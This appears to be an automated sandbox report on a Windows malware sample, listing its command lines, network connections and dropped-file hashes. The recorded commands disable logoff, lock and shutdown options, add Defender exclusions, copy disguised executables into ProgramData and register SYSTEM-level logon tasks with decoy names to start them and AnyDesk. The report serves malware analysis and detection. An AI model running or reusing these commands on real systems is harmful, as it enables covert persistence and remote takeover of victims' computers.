REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv Zaa7TMQPjES0SaK7eWRoQg.0.1
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\timeout.exe
timeout /T 2 /NOBREAK
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=8576,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| US | 212.102.60.111:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-79bdf984.net.anydesk.com | udp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.60.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.165.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| NL | 2.18.121.23:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.68.209.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.45.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 104.244.42.130:443 | api.x.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| GB | 199.232.56.158:443 | video.twimg.com | tcp |
| PL | 93.184.220.70:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | 200.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.220.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| BE | 2.17.107.123:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.107.17.2.in-addr.arpa | udp |
| BE | 2.17.107.123:443 | www.bing.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| BE | 88.221.83.202:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 202.83.221.88.in-addr.arpa | udp |
| US | 212.102.60.111:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | appleid.cdn-apple.com | udp |
| US | 8.8.8.8:53 | appleid.cdn-apple.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| BE | 104.68.84.171:443 | appleid.cdn-apple.com | tcp |
| US | 8.8.8.8:53 | relay-98c428ee.net.anydesk.com | udp |
| GB | 195.181.165.154:443 | relay-98c428ee.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| GB | 142.250.200.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 171.84.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.165.181.195.in-addr.arpa | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 104.16.5.5:443 | assets.sb-cd.com | udp |
| GB | 89.187.167.6:443 | c.ptgncdn.com | tcp |
| GB | 89.187.167.6:443 | c.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 104.16.5.5:443 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | 98.130.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.4.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.5.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | flagb93361.spankbang.com | udp |
| US | 104.19.130.98:443 | flagb93361.spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| GB | 195.181.164.19:443 | static.javhd.com | tcp |
| GB | 195.181.164.16:443 | a.magsrv.com | tcp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 74.117.182.35:443 | stats.postgen.com | tcp |
| US | 74.117.182.35:443 | stats.postgen.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 74.117.182.35:443 | stats.postgen.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.245:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| NL | 95.211.229.245:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | udp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 104.18.53.225:443 | video.ktkjmp.com | udp |
| US | 172.64.147.206:443 | go.xlviirdr.com | udp |
| US | 172.64.147.206:443 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.11.106:443 | img.strpst.com | udp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 104.18.40.50:443 | go.xxxviijmp.com | udp |
| US | 8.8.8.8:53 | vstream-13.sb-cd.com | udp |
| US | 8.8.8.8:53 | vstream-13.sb-cd.com | udp |
| DE | 212.102.56.137:443 | vstream-13.sb-cd.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 19.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.182.117.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.229.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.53.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.11.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.56.102.212.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.18.53.225:443 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| GB | 195.181.164.11:443 | edge-hls.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | b-hls-10.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | b-hls-10.sacdnssedge.com | udp |
| GB | 195.181.164.24:443 | b-hls-10.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | 11.164.181.195.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| GB | 195.181.164.11:443 | b-hls-10.sacdnssedge.com | tcp |
| GB | 195.181.164.11:443 | b-hls-10.sacdnssedge.com | tcp |
| GB | 195.181.164.11:443 | b-hls-10.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | 24.164.181.195.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| GB | 89.187.167.6:443 | s3t3d2y8.afcdn.net | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| BE | 88.221.83.202:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 24.121.18.2.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:42781 | udp | |
| N/A | 239.255.102.18:21828 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:13622 | udp | |
| N/A | 239.255.102.18:11577 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:49362 | udp | |
| N/A | 239.255.102.18:6996 | udp | |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| GB | 18.245.187.52:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 52.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs
| MD5 | 3c37e86d3572f4f291e0bf5c9ab78e41 |
| SHA1 | 4a2617dbbba0fc65275bbacf6738d604cbfd4eae |
| SHA256 | 426f46f8c62e39fffe4e2763cf87d3b5de568b0a0179737028db0e2ed43d0e16 |
| SHA512 | 5e827131ef024f358d3fc952f8b489003568b948d0a5a24556db1aeb8b00b21a04d1f6483652bf830a5050ccc3d734b27bf385129007305a93d16d844e84303c |
C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
| MD5 | 583050ddb118acb68beb4e210b243c53 |
| SHA1 | da7a9d361cb60ebe9e767710585cfeb4d0f84444 |
| SHA256 | 10c2c130f92a90332bf66f137978ff49d88397b71f0e31a9fccbfeabc1968245 |
| SHA512 | de869a3ee8d793a42a432c12b3cc6c0a4fbd60e4713c2f5199c576841c0d6640f66f9b2ba88af97f6b5dce5498cb5387687924941f1f24db8136a8bbe4cfece5 |
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat
| MD5 | c9dc4166ceb77ae5e86ea472b989b34c |
| SHA1 | 340ee384d950b11977799791854c793e7347b091 |
| SHA256 | 223338d4ba378aa7d08dec85f046a0c56accb9fb02dd01a9876c69a428fc0594 |
| SHA512 | 8533e83302ddc866d2e41e7adcc000083537d5975668bc9ac5266dfe43f89cf384d10eeecabeb940fc69f02d80ae5a8efd5c29ff084b3ca90b4bb7e13c95c7fe |
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
memory/4348-30-0x00000000005E0000-0x0000000001D29000-memory.dmp
memory/4700-37-0x00000000005E0000-0x0000000001D29000-memory.dmp
memory/1164-39-0x00000000005E0000-0x0000000001D29000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 28ea83fde5dd58635c08a46932ddb4c8 |
| SHA1 | 63352119e647dfd887032e67ef7c7a1c150ae137 |
| SHA256 | d90e87359d02c97d81773683310a6c2437a6fc4274decfab9ee8745000f7a969 |
| SHA512 | b171a28e2c9a8711d674943ebaa291613e0617f123e0dcd842601d32399ee96e00c18007c90fc288bac35863de733137025275db14a2d6b36617b696461d4de2 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | a787c308bd30d6d844e711d7579be552 |
| SHA1 | 473520be4ea56333d11a7a3ff339ddcadfe77791 |
| SHA256 | 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440 |
| SHA512 | da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 0c04ad1083dc5c7c45e3ee2cd344ae38 |
| SHA1 | f1cf190f8ca93000e56d49732e9e827e2554c46f |
| SHA256 | 6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0 |
| SHA512 | 6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | b06492be1b4392d0d2d2e1d34353756c |
| SHA1 | 43f488020dacf58aa90d5847d0660da2e31f382d |
| SHA256 | e2fe485af23b5311cdf32417ca5b34b70a9e578fda060e8f3f7f9bbfae01a85a |
| SHA512 | a60bc46a042eb1f2918ae60d9f2179d541a32d644fe0070ba9564493e254da543122c2f8593e8ca6d846138559189c79858ca3413aaba7fcf87c6a9f1512c8d9 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | e1cf0b1986c750165cb4c78386ef0648 |
| SHA1 | a4e8187cbdf2063ff154da0dd9c91116df44bb03 |
| SHA256 | eb68970fe0ae556917beb2db2f67e93a5378aea6382215b87a8511c40fa83468 |
